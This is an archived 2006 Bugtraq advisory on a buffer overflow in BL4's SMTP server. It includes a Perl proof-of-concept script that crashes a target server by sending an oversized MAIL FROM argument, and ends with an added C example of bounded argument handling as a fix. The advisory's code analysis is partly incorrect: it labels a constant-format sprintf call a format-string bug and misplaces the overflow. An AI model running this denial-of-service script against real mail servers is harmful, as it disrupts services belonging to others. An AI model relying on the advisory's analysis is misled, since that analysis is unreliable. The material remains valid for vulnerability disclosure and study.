Message-ID: <20060427082425.22763.qmail@securityfocus.com>
Date: 27 Apr 2006 08:24:25 -0000
From: the_day@...o.or.id
To: bugtraq@...urityfocus.com
Subject: BL4's SMTP server BufferOverflow Vulnerable


---------------------------------------------------------------------------
[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable
---------------------------------------------------------------------------

Author       : Dedi Dwianto
Date         : April, 27th 2006
Location     : Indonesia, Jakarta
Web          : http://advisories.echo.or.id/adv/adv30-theday-2006.txt
Critical Lvl : High
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : BL4's SMTP server
version     : < 0.1.5
URL         : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0
Description :

BL4's SMTP server is an inbound only SMTP server.
It currently uses hardcoded values for handling email. 
The SMTP server puts the incoming email into various text files.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~
BL4's SMTP server is prone to a flaw that can allow a remote attacker to
cause a denial of service or execute arbitrary code.
The vulnerability is due to a buffer overflow in the SMTP service.
A remote attacker can repeatedly send more than 2100 bytes as the argument to the HELO, MAIL FROM, and RCPT TO commands to crash the server.

------------------think.c-----------------------------------
                ...........
                {
                        slaveEmail[x]->isData = 0;
                        slaveEmail[x]->emailFrom = 0;
                        slaveEmail[x]->emailTo = 0;
                        free(buffer);
                        buffer = malloc(sizeof(char) * 12);
                        sprintf(buffer, "250 OK\r\n");
                        return buffer;
                }
                free(buffer);
                .............
                slaveEmail[x]->EHLO = buffer;
                slaveEmail[x]->EHLOtrue = 1;

                buffer = malloc(sizeof(char) * 12);
                sprintf(buffer, "250 OK\r\n"); 
                return buffer;
-----------------------------------------------------------
	--
	sprintf(buffer, "250 OK\r\n");
	--
	Vulnerable to format strings.

	--
	free(buffer);
	buffer = malloc(sizeof(char) * 12);
	--
	Vulnerable to buffer overflow.
	An attacker can execute arbitrary code here.


Poc:
~~~~~~~~~~~~

#!/usr/bin/perl

use IO::Socket;
use Socket;

my($socket) = "";


if($#ARGV < 1 | $#ARGV > 2) {usage()}

if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };
$adr = $ARGV[0];
$prt = $ARGV[1];

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";


        print " -- Connecting To SMTP server at $adr port $prt ... \n";

        sleep(1);

        print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to $adr .....\n" or die "Error : can't send Request\n";

        sleep(1);

        print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- Sending Buffer to $adr .....\n";

        sleep(1);
        printf("[+]Ok!\n");
        printf("[+]Crash service.....\n");
        printf("[~]Done.\n");

        close($socket);


sub usage()
 {
 print "\n=========================================\r\n";
 print "     BL4's SMTP server Remote DOS \r\n";
 print "=========================================\r\n";
 print "       Bug Found by Dedi Dwianto \r\n";
 print "    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
 print "      Echo Security Research Group \r\n";
 print "=========================================\r\n";
 print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";
 exit();
 }


---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ newbie_hacker@...oogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
     Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
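
For the overflow described in the advisory (oversized arguments to HELO, MAIL FROM and RCPT TO), the server-side fix is to bound the command line before anything is copied and to build replies with a length-checked call. The following is an added example, not code from BL4's SMTP server or from the advisory's author; the function names smtp_copy_arg and smtp_mail_from and the choice of RFC 5321's 512-octet command-line limit are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SMTP_MAX_LINE 512   /* RFC 5321 limit for a command line, CRLF included */

/* Hypothetical helper: return a heap copy of the argument that follows a
 * verb of verb_len bytes, or NULL when the line breaks the limits.
 * The copy is sized from the measured length, never from a constant. */
char *smtp_copy_arg(const char *line, size_t line_len, size_t verb_len)
{
    if (line_len > SMTP_MAX_LINE || line_len < verb_len + 2)
        return NULL;                              /* too long or too short */
    if (memcmp(line + line_len - 2, "\r\n", 2) != 0)
        return NULL;                              /* not CRLF terminated */
    if (memchr(line, '\0', line_len) != NULL)
        return NULL;                              /* embedded NUL byte */

    size_t arg_len = line_len - verb_len - 2;
    char *arg = malloc(arg_len + 1);
    if (arg == NULL)
        return NULL;
    memcpy(arg, line + verb_len, arg_len);
    arg[arg_len] = '\0';
    return arg;
}

/* Hypothetical handler for one "MAIL FROM:" line (verb matched case-sensitively
 * for brevity). Writes the reply into a caller-supplied buffer with snprintf
 * and returns the SMTP reply code; allocation failure is also reported as 501. */
int smtp_mail_from(const char *line, size_t line_len,
                   char *reply, size_t reply_size, char **from_out)
{
    static const char verb[] = "MAIL FROM:";
    size_t verb_len = sizeof(verb) - 1;
    int code = 250;
    const char *text = "OK";

    *from_out = NULL;
    if (line_len > SMTP_MAX_LINE) {
        code = 500; text = "Line too long";
    } else if (line_len < verb_len || memcmp(line, verb, verb_len) != 0 ||
               (*from_out = smtp_copy_arg(line, line_len, verb_len)) == NULL) {
        code = 501; text = "Syntax error in parameters";
    }
    snprintf(reply, reply_size, "%d %s\r\n", code, text);
    return code;
}
```

The caller owns the string returned through from_out and must free it; the same length check applies unchanged to HELO/EHLO and RCPT TO lines.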

